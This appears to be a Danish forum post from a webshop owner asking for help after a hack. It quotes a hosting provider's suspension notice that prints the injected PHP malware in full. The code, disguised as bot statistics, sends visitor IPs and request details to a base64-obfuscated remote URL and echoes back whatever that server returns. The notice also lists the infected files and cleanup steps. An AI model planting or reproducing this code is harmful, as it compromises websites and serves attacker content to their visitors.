Som overskriften så pænt siger er min webshop blevet hacket.
Jeg kan ikke selv finde ud af hvordan jeg skal gøre sådan noget, har snakket med one.com omkring dette og de siger at jeg skal finde en programmør / webmand der kan hjælpe med det. Da jeg ved at Amino er stedet for programmøre / webmænd tænker jeg at jeg kunne få den hjælp jeg mangler her.
ONE:
Lau: Vi har midlertidigt suspenderet dit web-hotel, fordi du har usikker og skadelig kode liggende på dit web-hotel, som er blevet udnyttet af hackere. Vores tekniker giver flg. instruktion vedr. suspenderingen:
Lau: ---------------------------------------------------
Lau: You must:
Lau: - Remove malware script
Lau: - Install antivirus program
Lau: - Change FTP password
Lau: Malware like this...
Lau: if (!isset($sRetry))
Lau: {
Lau: global $sRetry;
Lau: $sRetry = 1;
Lau: // This code use for global bot statistic
Lau: $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
Lau: $stCurlHandle = NULL;
Lau: $stCurlLink = "";
Lau: if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
Lau: {
Lau: if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
Lau: $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
Lau: @$stCurlHandle = curl_init( $stCurlLink );
Lau: }
Lau: }
Lau: if ( $stCurlHandle !== NULL )
Lau: {
Lau: curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
Lau: curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
Lau: $sResult = @curl_exec($stCurlHandle);
Lau: if ($sResult[0]=="O")
Lau: {$sResult[0]=" ";
Lau: echo $sResult; // Statistic code end
Lau: }
Lau: curl_close($stCurlHandle);
Lau: }
Lau: }
Lau: ?>
Lau: ...injected into the following files:
Lau: /download/index.php
Lau: /css/index.php
Lau: /docs/licences/index.php
Lau: /config/index.php
Lau: /themes/prestashop/index.php
Lau: /themes/theme007/index.php
Lau: ALSO the following files uploaded and should be deleted:
Lau: /counter.php
Lau: Further notes:
Lau: Please note that this list may not be complete.
Lau: Please check all your files to make sure the malicious code in files are all removed.
Lau: Remember that all computers connecting to your FTP are possible hosts
Lau: of a virus and should be scanned using an up to date antivirus.